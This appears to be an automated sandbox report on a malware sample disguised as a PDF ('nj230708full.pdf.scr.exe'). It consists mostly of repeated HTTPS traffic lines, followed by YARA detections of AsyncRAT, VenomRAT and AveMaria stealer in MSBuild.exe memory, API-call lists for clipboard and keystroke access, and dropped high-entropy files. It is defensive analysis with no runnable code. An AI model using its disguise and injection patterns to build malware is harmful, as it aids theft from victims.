Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49990 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AFF5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

18_2_00AFF5B0

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AFF345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

18_2_00AFF345

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00B19B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

18_2_00B19B7E

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Pay entropy: 7.99800745968	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Dame entropy: 7.99748681816	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Fellowship entropy: 7.99633372352	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Amazon entropy: 7.99809017915	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Aboriginal entropy: 7.99760765696	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Enhancing entropy: 7.9980916366	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Economic entropy: 7.99801255864	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Brain entropy: 7.99781702849	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Escorts entropy: 7.99772004612	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Eat entropy: 7.99799364389	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Planes entropy: 7.99803911935	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Cinema entropy: 7.99106058417	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Sampling entropy: 7.99781872866	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Colombia entropy: 7.99792446291	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Junk entropy: 7.99783453321	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Locator entropy: 7.99588717252	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Wherever entropy: 7.99820710938	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Higher entropy: 7.99728510828	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Waiver entropy: 7.99700041804	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Railroad entropy: 7.99778013193	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Nuke entropy: 7.99842862927	Jump to dropped file
Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Innovations entropy: 7.99797317134	Jump to dropped file
